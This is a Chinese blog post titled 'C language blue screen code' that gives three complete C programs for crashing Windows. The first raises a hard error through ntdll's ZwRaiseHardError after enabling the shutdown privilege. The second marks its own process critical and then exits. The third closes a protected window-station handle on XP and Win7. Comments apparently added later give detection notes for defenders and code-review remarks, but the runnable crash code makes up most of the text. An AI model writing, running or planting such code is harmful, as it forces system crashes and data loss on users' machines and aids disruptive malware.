C 语言蓝屏代码
1. Win10、XP 可用
#include <Windows.h>
#include <STDBOOL.h>
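/*
 * Enable one named privilege in the current process token, or disable every
 * privilege the token holds.
 *
 * lpPrivilegeName  Privilege name to enable (e.g. SE_SHUTDOWN_NAME). Ignored
 *                  when fEnable is FALSE; must not be NULL when it is TRUE.
 * fEnable          TRUE  -> enable lpPrivilegeName.
 *                  FALSE -> disable all privileges (DisableAllPrivileges = TRUE).
 *
 * Returns TRUE only when the requested change was really applied. The token
 * handle is closed on every path; the original leaked it on each call.
 */
BOOL SetPrivilege(LPCSTR lpPrivilegeName, WINBOOL fEnable)
{
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES NewState;
    BOOL fResult = FALSE;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
    {
        /* No handle was opened, so there is nothing to release. */
        return FALSE;
    }

    if (fEnable == FALSE)
    {
        /* Drop every privilege in the token; the name argument is not used. */
        fResult = AdjustTokenPrivileges(hToken, TRUE, NULL, 0, NULL, NULL) ? TRUE : FALSE;
        goto cleanup;
    }

    /* A NULL name cannot be looked up; fail instead of passing it on. */
    if (lpPrivilegeName == NULL)
    {
        goto cleanup;
    }

    /* Resolve the name to a LUID. The original ignored this result and could
     * go on to use an uninitialised LUID for an unknown privilege name. */
    NewState.PrivilegeCount = 1;
    if (!LookupPrivilegeValue(NULL, lpPrivilegeName, &NewState.Privileges[0].Luid))
    {
        goto cleanup;
    }
    NewState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    if (!AdjustTokenPrivileges(hToken, FALSE, &NewState, 0, NULL, NULL))
    {
        goto cleanup;
    }

    /* AdjustTokenPrivileges reports success even when the token does not hold
     * the privilege; that case is only visible through the last-error value.
     * Read it before CloseHandle(), which may overwrite it. */
    fResult = (GetLastError() == ERROR_NOT_ALL_ASSIGNED) ? FALSE : TRUE;

cleanup:
    CloseHandle(hToken);
    return fResult;
}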
/*
 * Hand-written declarations for the ntdll hard-error call that main() resolves
 * by name at run time. They are declared in this file rather than taken from a
 * header, so enumerator order and struct layout must match what ntdll expects.
 * NOTE(review): identifiers starting with underscore + uppercase are reserved
 * in C; they appear to be kept here to mirror the native naming.
 */
/* Values passed as ValidResponseOptions. The enumerators take the implicit
 * values 0..8 in declaration order, so OptionShutdownSystem is 6. */
typedef enum _HARDERROR_RESPONSE_OPTION {
OptionAbortRetryIgnore,
OptionOk,
OptionOkCancel,
OptionRetryCancel,
OptionYesNo,
OptionYesNoCancel,
OptionShutdownSystem,
OptionOkNoWait,
OptionCancelTryContinue
} HARDERROR_RESPONSE_OPTION;
/* Function-pointer type for the "ZwRaiseHardError" export that main() looks up
 * with GetProcAddress. Parameters is typed PULONG_PTR, i.e. pointer-sized slots. */
typedef LONG (WINAPI *type_ZwRaiseHardError)(LONG ErrorStatus, ULONG NumberOfParameters, ULONG UnicodeStringParameterMask, PULONG_PTR Parameters, HARDERROR_RESPONSE_OPTION ValidResponseOptions, PULONG Response);
/* Counted wide string. main() initialises it as {8, 10, L"test"}: Length is the
 * byte count of the four characters, MaximumLength also covers the terminator. */
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWCH Buffer;
} UNICODE_STRING;
/*
 * Sample 1: enables SeShutdownPrivilege on the current process and then raises
 * a hard error with the shutdown response option, which bug-checks the machine.
 *
 * Defender's view: the observable sequence is (1) a process enabling
 * SeShutdownPrivilege on its own token, (2) resolving a hard-error export from
 * ntdll by name instead of importing it, (3) calling it with
 * OptionShutdownSystem. Privilege-use auditing and API-level endpoint telemetry
 * on non-system binaries are the places to look. Who holds the privilege is
 * governed by the "Shut down the system" user right.
 * NOTE(review): that right is normally granted to interactive users on
 * workstations, which would explain why this sample's heading lists no
 * elevation requirement. Confirm against local policy.
 */
int main(int argc, char* argv[])
{
/* Detach from the console so no console window remains attached. */
FreeConsole();
UNICODE_STRING str = {8, 10, L"test"};
/* Three parameter slots: two arbitrary constants and the address of str.
 * NOTE(review): args is ULONG[] while the prototype takes PULONG_PTR, and the
 * address is cast to ULONG; the types only coincide on 32-bit builds. */
ULONG x, args[] = {0x12345678, 0x87654321, (ULONG)&str};
/* NOTE(review): neither the module handle nor the export address is checked;
 * a failed lookup leaves a NULL function pointer that is called below. */
HMODULE hDll = GetModuleHandle(TEXT("ntdll.dll"));
type_ZwRaiseHardError ZwRaiseHardError = (type_ZwRaiseHardError)GetProcAddress(hDll, "ZwRaiseHardError");
bool bSuccess = SetPrivilege(SE_SHUTDOWN_NAME, TRUE);
/* Only raised when the privilege was enabled. 0xC000021A is the status value
 * passed as ErrorStatus; 3 is the parameter count; mask 4 (bit 2) presumably
 * marks the third slot as a UNICODE_STRING pointer. x receives the response. */
if(bSuccess) ZwRaiseHardError(0xC000021A, 3, 4, args, OptionShutdownSystem, &x);
/* Reached only if the call above returned: disable all token privileges again. */
SetPrivilege(NULL, FALSE);
return 0;
}
2. XP 可用;Win7、Win10 需要 UAC 管理员许可
#include <windows.h>
#include <STDBOOL.h>
/*
 * Sample 2: enables privilege 20 on the process, marks the process as critical
 * and then exits; termination of a critical process bug-checks the machine.
 *
 * Defender's view: this path needs SeDebugPrivilege, so, as the heading says,
 * it only works from an elevated (UAC-approved) context on Win7/Win10. Keeping
 * the "Debug programs" user right restricted and reviewing elevation prompts
 * are the relevant controls. Telemetry worth alerting on is a non-system
 * process resolving RtlSetProcessIsCritical from ntdll or setting its own
 * critical flag.
 */
int main() {
/* Local function-pointer types for two ntdll exports resolved at run time.
 * NOTE(review): RtlAdjustPrivilege is declared here with BOOL return and BOOL
 * arguments; other declarations of this undocumented routine use
 * NTSTATUS/BOOLEAN. Confirm. */
typedef NTSTATUS(WINAPI *RtlSetProcessIsCritical) (BOOLEAN, PBOOLEAN, BOOLEAN);
typedef BOOL(WINAPI *RtlAdjustPrivilege) (ULONG, BOOL, BOOL, PBOOLEAN);
RtlAdjustPrivilege AdjustPrivilege;
RtlSetProcessIsCritical SetCriticalProcess;
// Load ntdll and look up the two APIs.
// NOTE(review): none of the three results is checked; a failed lookup leaves a
// NULL function pointer that is called below.
HANDLE ntdll = LoadLibrary(TEXT("ntdll.dll"));
AdjustPrivilege = (RtlAdjustPrivilege)GetProcAddress((HINSTANCE)ntdll, "RtlAdjustPrivilege");
SetCriticalProcess = (RtlSetProcessIsCritical)GetProcAddress((HINSTANCE)ntdll, "RtlSetProcessIsCritical");
BOOLEAN b;
// Raise the process to Debug privilege (20 is SeDebugPrivilege); requires UAC
// administrator approval. The result is not checked, so the next call runs
// even when the privilege was not granted. b presumably receives the previous
// state and is never read.
AdjustPrivilege(20UL, TRUE, FALSE, &b);
// Mark this process as a critical process. The return status is ignored.
SetCriticalProcess(TRUE, NULL, FALSE);
// Exit; this triggers the CRITICAL_PROCESS_DIED blue screen.
return 0;
}
3. XP、Win7 可用,Win10 不可用
#include <windows.h>
/*
 * Sample 3: creates a window station, flags its handle as protected from close,
 * then asks to close it anyway. Per the heading above, this brings down XP and
 * Win7 but does not reproduce on Win10.
 *
 * Defender's view: no privilege is adjusted here, so privilege auditing will
 * not see it. Exposure is tied to the OS version, and the page itself indicates
 * that Win10 is not affected, so unsupported XP/Win7 hosts are where this matters.
 */
int main(){
HWINSTA hWinSta;
/* Arguments in order: name, flags, desired access (55), security attributes.
 * NOTE(review): a narrow string literal is passed to the TCHAR-based macro, and
 * the returned handle is not checked for NULL before use. */
hWinSta = CreateWindowStation("abc123", NULL, 55, NULL);
/* Set HANDLE_FLAG_PROTECT_FROM_CLOSE on the handle (mask and value are equal). */
SetHandleInformation(hWinSta, HANDLE_FLAG_PROTECT_FROM_CLOSE, HANDLE_FLAG_PROTECT_FROM_CLOSE);
/* Close request on the protected handle; this is the call the sample relies on. */
CloseWindowStation(hWinSta);
return 0;
}
更新(2020.3.25):删除了第 4 种方法。
本文来自博客园,作者:Ruptpsych,转载请注明原文链接:https://www.cnblogs.com/obj-a/articles/C-LANGUAGE-BSOD.html